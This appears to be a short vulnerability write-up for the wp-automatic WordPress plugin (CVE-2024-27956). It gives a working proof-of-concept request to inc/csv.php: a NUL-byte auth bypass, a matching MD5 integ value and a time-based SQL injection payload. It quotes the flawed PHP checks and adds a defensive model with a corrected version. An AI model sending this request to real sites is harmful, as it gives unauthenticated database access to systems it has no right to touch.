Source: https://github.com/truonghuuphuc/CVE-2024-27956/
Download the vulnerable version of the plugin package: https://github.com/truonghuuphuc/CVE-2024-27956/blob/main/wp-automatic.zip
POC: /wp-content/plugins/wp-automatic/inc/csv.php
POST data: q=SELECT+IF(1=1,sleep(5),sleep(0))&auth=%00&integ=93cf9aa11e746596d6f31765a7222c9f
The value of integ is the MD5 hash of the query content, as the checks in csv.php show:
if(wp_automatic_trim($auth == '')){   // the comparison is evaluated before the trim, so trim() receives a boolean
    echo 'login required';
    exit;
}
if(wp_automatic_trim($auth) != wp_automatic_trim($current_user->user_pass)){   // loose (!=) comparison against the current user's password
    echo 'invalid login';
    exit;
}
if(md5(wp_automatic_trim($q.$current_user->user_pass)) != $integ ){   // integ must equal md5(query . user_pass)
    echo 'Tampered query';
    exit;
}
$rows=$wpdb->get_results( $q);   // the raw query is executed as-is
$date=date("F j, Y, g:i a s");
$fname=md5($date);
header("Content-type: application/csv");
header("Content-Disposition: attachment; filename=$fname.csv");
header("Pragma: no-cache");
header("Expires: 0");
echo "DATE,ACTION,DATA,KEYWORD \n";
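To make the bypass concrete from a defender's side, here is an added PHP example (not the plugin's code and not the vendor's patch) that models the three checks above and sets them beside a corrected form; it assumes wp_automatic_trim() behaves like PHP's trim(), which strips NUL bytes, and that user_pass is empty for a logged-out visitor. Run under php, the vulnerable chain accepts the POC's auth=%00 while the corrected one answers 'login required'.

```php
<?php
// Added example, not the plugin's code: models the three checks in csv.php.
// wp_automatic_trim() is assumed to behave like PHP's trim(), which strips
// NUL bytes ("\0") as well as whitespace; the stand-in below is hypothetical.
function wp_automatic_trim_model($s): string {
    return trim((string) $s);
}

// The checks as written in the vulnerable version. Returns 'ok' or the message the original echoes.
function check_vulnerable(string $q, string $auth, string $integ, string $user_pass): string {
    // The comparison is evaluated first, so trim() receives a boolean;
    // trim(false) is '' for every non-empty $auth, and this check never fires.
    if (wp_automatic_trim_model($auth == '')) {
        return 'login required';
    }
    // For a logged-out visitor $user_pass is empty, and trim("\0") is '' too.
    if (wp_automatic_trim_model($auth) != wp_automatic_trim_model($user_pass)) {
        return 'invalid login';
    }
    if (md5(wp_automatic_trim_model($q . $user_pass)) != $integ) {
        return 'Tampered query';
    }
    return 'ok';
}

// A corrected form (illustrative, not the vendor's patch): trim before comparing,
// reject an empty credential on either side, and compare in constant time.
function check_fixed(string $q, string $auth, string $integ, string $user_pass): string {
    $auth = wp_automatic_trim_model($auth);
    $pass = wp_automatic_trim_model($user_pass);
    if ($auth === '' || $pass === '') {
        return 'login required';
    }
    if (!hash_equals($pass, $auth)) {
        return 'invalid login';
    }
    if (!hash_equals(md5(wp_automatic_trim_model($q . $pass)), $integ)) {
        return 'Tampered query';
    }
    return 'ok';
}

// Constructed request: the POC's auth=%00 with an empty stored password (logged-out visitor).
$q     = 'SELECT 1';
$auth  = "\0";
$pass  = '';
$integ = md5($q);   // with an empty password, integ covers only the query
var_dump(check_vulnerable($q, $auth, $integ, $pass));
var_dump(check_fixed($q, $auth, $integ, $pass));
```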
Nothing hard here: read the vulnerable code against the POC and it becomes clear. As for how to take it further, I'll leave that for you to work out yourself~